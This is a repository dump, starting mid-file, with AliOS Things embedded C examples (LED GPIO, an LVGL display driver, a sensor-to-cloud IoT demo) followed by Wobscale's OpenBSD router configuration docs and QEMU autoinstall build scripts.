NULL); } int application_start(int argc, char *argv[]) { #ifdef STM32L496xx // developerkit /* gpio port config */ led.port = GPIO_LED_IO; /* set as output mode */ led.config = OUTPUT_PUSH_PULL; /* configure GPIO with the given settings */ hal_gpio_init(&led); /* gpio port config */ trigger.port = GPIO_TRIGGER_IO; /* set as output mode */ trigger.config = OUTPUT_PUSH_PULL; /* configure GPIO with the given settings */ hal_gpio_init(&trigger); /* input pin config */ input.port = GPIO_INPUT_IO; /* set as interrupt mode */ input.config = IRQ_MODE; /* configure GPIO with the given settings */ hal_gpio_init(&input); /* gpio interrupt config */ hal_gpio_enable_irq(&input, IRQ_TRIGGER_BOTH_EDGES, 
gpio_isr_handler, (void *) GPIO_INPUT_IO); aos_post_delayed_action(1000, app_trigger_low_action, NULL); #else led_red.port = GPIO_RED; /* set as output mode */ led_red.config = OUTPUT_PUSH_PULL; hal_gpio_init(&led_red); led_blue.port = GPIO_BLUE; /* set as output mode */ led_blue.config = OUTPUT_PUSH_PULL; hal_gpio_init(&led_blue); led_green.port = GPIO_GREEN; /* set as output mode */ led_green.config = OUTPUT_PUSH_PULL; /* configure GPIO with the given settings */ hal_gpio_init(&led_green); int cnt = 0; while (1) { /* Insert delay 1000 ms */ printf(" race led loop %d \n",cnt++); aos_msleep(333); hal_gpio_output_toggle(&led_green); aos_msleep(333); hal_gpio_output_toggle(&led_blue); aos_msleep(333); hal_gpio_output_toggle(&led_red); } #endif aos_loop_run(); return 0; } <file_sep>/app/example/sensor_gui/developerkitgui.c /* * Copyright (C) 2015-2017 Alibaba Group Holding Limited */ #include <k_api.h> #include "lvgl.h" #include "aos/kernel.h" #include "soc_init.h" #include "sensor_display.h" #include "freetype_display.h" #include "netmgr.h" #include "aos/yloop.h" #include "ulog/ulog.h" #define FREETYPE_DISPLAY 0 extern volatile char g_wifi_connect; static void gui_init(void); static void littlevgl_refresh_task(void *arg); static void lvgl_disp_drv_init(void); static void my_disp_flush(lv_disp_drv_t * disp_drv, const lv_area_t * area, lv_color_t * color_p); extern int freetype_init(void); extern void sensor_cloud_test(void *arg); /* wifi connect success callback */ static void wifi_service_event(input_event_t *event, void *priv_data) { netmgr_ap_config_t config; if (event->type != EV_WIFI) { return; } if (event->code != CODE_WIFI_ON_GOT_IP) { return; } memset(&config, 0, sizeof(netmgr_ap_config_t)); netmgr_get_ap_config(&config); LOG("wifi_service_event config.ssid %s", config.ssid); if (strcmp(config.ssid, "adha") == 0 || strcmp(config.ssid, "aha") == 0) { return; } #ifdef EN_COMBO_NET if (awss_running) { awss_success_notify(); } #endif /* Set wifi connect flag */ if 
(g_wifi_connect == 0) { g_wifi_connect = 1; } } /* display driver */ lv_disp_drv_t disp_drv; int application_start(int argc, char *argv[]) { #ifdef WITH_SAL sal_add_dev(NULL, NULL); /* Sal initialize if needed */ sal_init(); #endif printf("application_start\n"); netmgr_init(); netmgr_start(false); aos_register_event_filter(EV_WIFI, wifi_service_event, NULL); int ret =aos_task_new("sensor_cloud_test", sensor_cloud_test, NULL, 8192); gui_init(); aos_loop_run(); return 0; } void gui_init(void) { /* init littlevGL */ lv_init(); #if FREETYPE_DISPLAY == 1 freetype_init(); #endif /* init LCD */ st7789_init(); /* register driver for littlevGL */ lvgl_disp_drv_init(); /* Register wifi connect callback */ /* create a task to refresh the LCD */ int ret = aos_task_new("littlevgl_refresh_task", littlevgl_refresh_task, NULL, 4096); /* start app */ #if FREETYPE_DISPLAY == 0 sensor_display(); #else freetype_display(); #endif } static void littlevgl_refresh_task(void *arg) { while (1) { static int cnt = 0; // if (cnt++ % 100 == 0) // printf("littlevgl_refresh_task !\n"); /* this function is used to refresh the LCD */ lv_task_handler(); krhino_task_sleep(RHINO_CONFIG_TICKS_PER_SECOND / 10); } } void lvgl_disp_drv_init(void) { static lv_disp_buf_t disp_buf_2; static lv_color_t buf2_1[LV_HOR_RES_MAX * 10]; /*A buffer for 10 rows*/ static lv_color_t buf2_2[LV_HOR_RES_MAX * 10]; /*An other buffer for 10 rows*/ lv_disp_buf_init(&disp_buf_2, buf2_1, buf2_2, LV_HOR_RES_MAX * 10); /*Initialize the display buffer*/ /*----------------------------------- * Register the display in LittlevGL *----------------------------------*/ lv_disp_drv_init(&disp_drv); /*Basic initialization*/ /*Set up the functions to access to your display*/ /*Set the resolution of the display*/ disp_drv.hor_res = 240; disp_drv.ver_res = 240; /*Used to copy the buffer's content to the display*/ disp_drv.flush_cb = my_disp_flush; /*Set a display buffer*/ disp_drv.buffer = &disp_buf_2; /*Finally register the driver*/ 
lv_disp_drv_register(&disp_drv); } void my_disp_flush(lv_disp_drv_t * disp_drv, const lv_area_t * area, lv_color_t * color_p) { int32_t x = 0; int32_t y = 0; for (y = area->y1; y <= area->y2; y++) { ST7789H2_WriteLine(area->x1, y, (uint8_t *)color_p, (area->x2 - area->x1 + 1)); color_p += (area->x2 - area->x1 + 1); } lv_disp_flush_ready(&disp_drv); } <file_sep>/app/example/sensor_gui/sensor_cloud_demo.c /* * Copyright (C) 2015-2019 Alibaba Group Holding Limited */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include "aos/cli.h" #include "aos/kernel.h" #include "sensor/sensor.h" #include "aos/yloop.h" #include "ulog/ulog.h" #include "netmgr.h" #include "linkkit/infra/infra_compat.h" #include "linkkit/infra/infra_defs.h" #include "linkkit/dev_model_api.h" #include "app_entry.h" #include "linkkit/infra/infra_cjson.h" #include "soc_init.h" #define SENSOR_SAMPLE_TIME 1000 /* sensor sampling period is 1000 ms*/ #define PROP_POST_FORMAT_TEMP "{\"CurrentTemperature\":%.1f}" #define PROP_POST_FORMAT_HUMI "{\"CurrentHumidity\":%.1f}" #define PROP_POST_FORMAT_ALARMSTATUS "{\"AlarmState\":%d}" #define PROP_POST_FORMAT_ACC "{\"Accelerometer\":{\"x\":%.2f, \"y\":%.2f, \"z\":%.2f}}" volatile char g_wifi_connect = 0; /* wifi connect flag */ extern float alarm_setting; extern bool alarm_clear ; #ifdef AOS_COMP_CLI static void print_devinfo() { char _product_key[IOTX_PRODUCT_KEY_LEN + 1] = {0}; char _device_name[IOTX_DEVICE_NAME_LEN + 1] = {0}; #ifdef DEMO_DEBUG char _product_secret[IOTX_PRODUCT_SECRET_LEN + 1] = {0}; char _device_secret[IOTX_DEVICE_SECRET_LEN + 1] = {0}; #endif HAL_GetProductKey(_product_key); HAL_GetDeviceName(_device_name); LOG("pk:%s", _product_key); LOG("dn:%s", _device_name); #ifdef DEMO_DEBUG HAL_GetProductSecret(_product_secret); HAL_GetDeviceSecret(_device_secret); LOG("ps:%s", _product_secret); LOG("ds:%s", _device_secret); #endif } static void set_devinfo(char *pk, char *ps, char *dn, char *ds) { if (dn != NULL) { 
HAL_SetDeviceName(dn); } if (ds != NULL) { HAL_SetDeviceSecret(ds); } if (pk != NULL) { HAL_SetProductKey(pk); } if (ps != NULL) { HAL_SetProductSecret(ps); } } static void handle_devinfo_cmd(char *pwbuf, int blen, int argc, char **argv) { const char *rtype = argc > 1 ? argv[1] : ""; if (strcmp(rtype, "get") == 0) { print_devinfo(); } else if (strcmp(rtype, "set") == 0) { if (argc == 4) { set_devinfo(NULL, NULL, argv[2], argv[3]); } else if (argc == 5) { set_devinfo(argv[2], argv[3], argv[4], ""); } else if (argc == 6) { set_devinfo(argv[2], argv[3], argv[4], argv[5]); } else { LOG("arg number err! usage:"); LOG("devinfo set {pk} {ps} {dn} [ds] | devinfo set {dn} {ds}"); } } else if (strcmp(rtype, "clean") == 0) { set_devinfo("", "", "", ""); } else { LOG("usage:"); LOG("devinfo [set pk ps dn ds | set dn ds | get | clean]"); } } static struct cli_command devinfo_cmd = { .name = "devinfo", .help = "devinfo [set pk ps dn ds | set dn ds | get | clean ]", .function = handle_devinfo_cmd }; #endif /* linkkit initialize callback */ static int user_initialized(const int devid) { user_example_ctx_t *user_example_ctx = user_example_get_ctx(); LOG("Device Initialized, Devid: %d", devid); /* Set the linkkit initialize success flag */ if (user_example_ctx->master_devid == devid) { user_example_ctx->master_initialized = 1; } return 0; } #define MESSAGE_ALARM_FLAG_ID "alarm_off" #define MESSAGE_ALARM_SETTING_ID "alarm_setting" static aos_mutex_t mutex_message_callback; void usr_message_arrive2(const int fd, const unsigned char * message, const int len) { char alarm_flag; char *payload = message; LOG("Message Arrived: %s",message); if (aos_mutex_lock(&mutex_message_callback, AOS_WAIT_FOREVER)) return; int res = 0; lite_cjson_t lite, lite_item_id, lite_item_code, lite_item_devid; if (payload == NULL) { aos_mutex_unlock(&mutex_message_callback); return; } /* Parse JSON */ res = lite_cjson_parse(payload, strlen(payload), &lite); if (res != SUCCESS_RETURN || 
!lite_cjson_is_object(&lite)) { aos_mutex_unlock(&mutex_message_callback); return; } /* Parse Message ID */ res = lite_cjson_object_item(&lite, MESSAGE_ALARM_FLAG_ID, strlen(MESSAGE_ALARM_FLAG_ID), &lite_item_id); if (res != SUCCESS_RETURN || !lite_cjson_is_number(&lite_item_id)) { //return; } else { alarm_clear = lite_item_id.value_int; LOG("lite_item_id.value_int : %d ,alarm_clear : %d", lite_item_id.value_int,alarm_clear); } res = lite_cjson_parse(payload, strlen(payload), &lite); if (res != SUCCESS_RETURN || !lite_cjson_is_object(&lite)) { //return; } res = lite_cjson_object_item(&lite, MESSAGE_ALARM_SETTING_ID, strlen(MESSAGE_ALARM_SETTING_ID), &lite_item_id); if (res != SUCCESS_RETURN || !lite_cjson_is_number(&lite_item_id)) { //return; } else { char buffer[128]={0}; alarm_setting = (float)lite_item_id.value_int; sprintf(buffer,"%f",alarm_setting); if (alarm_setting > 20 && alarm_setting < 60) kv_item_set(MESSAGE_ALARM_SETTING_ID, buffer, strlen(buffer)); LOG("lite_item_id.value_int %d ,alarm_setting : %f", lite_item_id.value_int,alarm_setting); } aos_mutex_unlock(&mutex_message_callback); } extern float g_temp; extern float g_humi; /* sensor cloud test, include the following functions */ /* 1. wait wifi conect */ /* 2. link aliyun server */ /* 3. sensor start */ /* 4. 
handle linkkit event */ void sensor_cloud_test(void *arg) { int ret = 0; static char param[128]; iotx_linkkit_dev_meta_info_t master_meta_info; user_example_ctx_t *user_ctx = user_example_get_ctx(); #ifdef AOS_COMP_CLI aos_cli_register_command(&devinfo_cmd); #endif (void)arg; aos_mutex_new(&mutex_message_callback); /* Wait the wifi connect flag to set */ while (g_wifi_connect == 0) { static int cnt = 0; static int retry = 0; aos_msleep(100); if (cnt++ == 80) { printf("Connect AP failed , retry ....\n\n"); netmgr_start(true); if (retry++ < 5) { cnt = 0; } } if (cnt > 200) cnt = 0; } /* Linkkit start */ ret = linkkit_init(); if (ret != 0){ return; } /* Register linkkit initialize callback */ IOT_RegisterCallback(ITE_INITIALIZE_COMPLETED, user_initialized); memset(&master_meta_info, 0, sizeof(iotx_linkkit_dev_meta_info_t)); #if 0 memcpy(master_meta_info.product_key, PRODUCT_KEY, strlen(PRODUCT_KEY)); memcpy(master_meta_info.product_secret, PRODUCT_SECRET, strlen(PRODUCT_SECRET)); memcpy(master_meta_info.device_name, DEVICE_NAME, strlen(DEVICE_NAME)); memcpy(master_meta_info.device_secret, DEVICE_SECRET, strlen(DEVICE_SECRET)); #else HAL_GetProductKey(master_meta_info.product_key); HAL_GetDeviceName(master_meta_info.device_name); HAL_GetDeviceSecret(master_meta_info.device_secret); #endif /* Create a new device */ user_ctx->master_devid = IOT_Linkkit_Open(IOTX_LINKKIT_DEV_TYPE_MASTER, &master_meta_info); if (user_ctx->master_devid < 0) { printf("IOT_Linkkit_Open Failed\n"); return; } /* Start Connect Aliyun Server */ ret = IOT_Linkkit_Connect(user_ctx->master_devid); if (ret < 0) { printf("IOT_Linkkit_Connect Failed\n"); return; } #if 0 /* Open the acceleration sensor device */ ret = sensor_hal_open(TAG_DEV_ACC, 0); if (ret != 0) { return; } #endif { static char buff[128] = "user/get"; static iotx_user_subscribe_context context={buff,usr_message_arrive2}; IOT_Ioctl(IOTX_IOCTL_SUB_USER_TOPIC,&context); } /* Enter loop run to handle linkkit event */ while (1) { float 
temp; static bool bflag =false; /* Read the temperature sensor data */ hal_gpio_output_low(&brd_gpio_table[GPIO_LED_3]); temp = g_temp; { /* Print the temperature sensor data */ printf("\nTemperature value : %.1f centidegree\n", ((float)temp)); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_TEMP, ((float)(temp))); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } temp = g_humi; { /* Print the temperature sensor data */ printf("\nHumi value : %.1f \n", ((float)temp)); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_HUMI, ((float)(temp))); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } bflag = !bflag; if(bflag) { /* Print the temperature sensor data */ memset(param, 0, 128); char alarmstatus = 0; if ((g_temp > alarm_setting) && (!alarm_clear)) alarmstatus = 1; /* build the report payload */ sprintf(param, PROP_POST_FORMAT_ALARMSTATUS, alarmstatus); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } hal_gpio_output_high(&brd_gpio_table[GPIO_LED_3]); IOT_Linkkit_Yield(15000); } }
72b93a7379feaebf1234eaa7ca372511d34acaed
[ "Markdown", "C", "Makefile" ]
8
Makefile
lihaijun7781/Alithings-3.0.0
64d5f1d44b15cca1ad9de6542a11ca6a0d64d55b
918e15076c419d89101334300bce4ee0390d0171
refs/heads/master
<repo_name>ilianaw/config<file_sep>/sea1/docs/adding-ip-address-mappings.md ## Adding an IP Address mapping ### Prereqs * You must have ssh access to the management network (bastion host) * You must have ssh and doas access to the router * You must have engaged the engineer oncall. ### Steps #### Access the wobscale router From the management network, you may access the router at 10.255.255.10 over ssh on port 22. ``` $ ssh 10.255.255.10 $ # Should be on da bsd $ cp /etc/dhcpd.conf $HOME/dhcpd.conf $ vim $HOME/dhcpd.conf # do some editing # Respect the existing format. Mimic it. Love it. TODO, document it and ansible it. $ dhcpd -n -c $HOME/dhcpd.conf && echo $? 0 # Validate. No ip or mac should be duplicated. Ever. Feel free to do a `grep -E "\d+.\d+.\d+.\d+" | uniq -c` type magic (note: totally untested one-liner for that file) $ doas mv $HOME/dhcpd.conf /etc/dhcpd.conf $ doas /etc/rc.d/dhcpd check # Service is running $ doas /etc/rc.d/dhcpd restart $ doas /etc/rc.d/dhcpd check # Service is running $ sleep 3 $ doas /etc/rc.d/dhcpd check # Service is running # Fuckit shipit ``` <file_sep>/sea1/router/autoinstall/serve_autoinstall.sh #!/bin/bash -e # SPDX-License-Identifier: GPL-3.0-only . 
vars SCRIPTPATH="$(cd "$(dirname "$0")"; pwd -P)" cd "$SCRIPTPATH" DATA=$(cat <<EOF System hostname = edge DNS domain name = sea1.wobscale.website Password for root = ************* Public ssh key for root = $(cat tmp/id_ed25519.pub) Allow root ssh login = prohibit-password Do you expect to run the X Window System = no Location of sets = http HTTP Server = $OPENBSD_MIRROR Server directory = $OPENBSD_PATH/amd64 Set name(s) = -all bsd.mp base* comp* man* Are you *SURE* your install is complete without 'bsd' = yes EOF ) echo -en "HTTP/1.1 200 k\r\n" echo -en "Content-Type: text/plain; charset=UTF-8\r\n" echo -en "Content-Length: $((${#DATA}+1))\r\n\r\n" echo "$DATA" <file_sep>/sea1/router/README.md This is the Ansible role for Wobscale's Seattle router, present on the Seattle Internet Exchange. The supported version of Ansible is the version available in [OpenBSD Ports](https://www.openbsd.org/faq/ports/) for the release we are currently using. For [OpenBSD 6.3 ports](https://cloudflare.cdn.openbsd.org/pub/OpenBSD/6.3/packages/amd64/) that version is 2.4.3.0. ## Running Ansible Run Ansible from the `sea1` directory (one above this README.md). First, check your changes: ```plain ansible-playbook -b --become-method=doas --check --diff router/playbook.yaml ``` Make your changes: ```plain ansible-playbook -b --become-method=doas router/playbook.yaml ``` <file_sep>/sea1/router/autoinstall/build.sh #!/bin/bash # SPDX-License-Identifier: GPL-3.0-only set -euo pipefail # TODO: perhaps boot with a serial console and use expect to automatically type the autoinstall bits # or perhaps: not . vars config_repo="${1:-https://github.com/wobscale/config.git}" config_branch="${2:-master}" die() { echo "$1" exit 1 } bold() { tput bold echo "$1" tput sgr0 } vm_ssh() { echo "# $1" | grep -v "^# true$" ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o LogLevel=QUIET \ -i tmp/id_ed25519 localhost -p 7922 -l root -t "$1" } boot_wait() { while ! 
vm_ssh true; do sleep 1; done sleep 10 # wait for init to settle } SCRIPTPATH="$(cd "$(dirname "$0")"; pwd -P)" cd "$SCRIPTPATH" ## Download and run cdXY.iso ISO_NAME="cd$(tr -d . <<<"$OPENBSD_RELEASE").iso" [[ -e "$ISO_NAME.sha256" ]] || die "$ISO_NAME.sha256 missing" [[ -e "$ISO_NAME" ]] || curl -O "https://$OPENBSD_MIRROR/$OPENBSD_PATH/amd64/$ISO_NAME" sha256sum -c "$ISO_NAME.sha256" mkdir -p tmp rm -f system.img tmp/id_ed25519 truncate -s 100G system.img ssh-keygen -t ed25519 -f tmp/id_ed25519 -N '' bold "Type [A] [Enter] at the \"Welcome to OpenBSD\" prompt" bold "Enter http://10.0.2.42/install.conf for the response file location" qemu-system-x86_64 \ -drive file=system.img,media=disk,format=raw \ -drive file=$ISO_NAME,media=cdrom \ -m 2048 -enable-kvm -smp 4 \ -netdev user,id=mynet0,hostfwd=tcp:127.0.0.1:7922-:22,guestfwd=tcp:10.0.2.42:80-cmd:$SCRIPTPATH/serve_autoinstall.sh \ -device e1000,netdev=mynet0 & boot_wait vm_ssh "syspatch" vm_ssh "echo 'github.com,192.168.3.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==' >> .ssh/known_hosts" vm_ssh "pkg_add ansible git" vm_ssh "cd /usr/src && git clone https://github.com/wobscale/openbsd-sys.git sys" vm_ssh "cd /usr/src/sys/arch/amd64/compile/GENERIC.MP && make obj && make config && make -j5 && make install" vm_ssh "git clone -b ${config_branch} ${config_repo} config && cd config && sed -i -e 's/^edge.sea1.*$/& ansible_connection=local/' sea1/hosts" ### Commands that require hitting the internet must go above this *final* line vm_ssh "cd config/sea1 && ansible-playbook --diff router/playbook.yaml && shutdown -p now && exit" wait <file_sep>/README.md The collection of files, Ansible 
roles, and scripts that helps Wobscale scale the wob. ## Licensing The code and Ansible playbooks are licensed under the [GNU General Public License v3.0](https://www.gnu.org/licenses/gpl-3.0.en.html). Documentation is licensed under the [CC0 1.0 Universal license](https://creativecommons.org/publicdomain/zero/1.0/). When in doubt, check the SPDX-License-Identifier header in any file. All files must have a SPDX-License-Identifier unless it is a short configuration file. <file_sep>/sea1/docs/router-misc.md ## Handy commands ### BGP ``` $ bgpctl show ``` ``` $ bgpctl show ip bgp 8.8.8.8 ``` #### Inspecting route-stuffs Useful for figuring out how routing tables are ``` $ route show ```
527b9fc9e1e3334b6699726870cc5c0c4128e7a7
[ "Markdown", "Shell" ]
6
Markdown
ilianaw/config
a10c540760b73b7b24c58c34628b68c870beed63
3a0a29ee027ed8ad490a1186cd0ae9e9708d77e1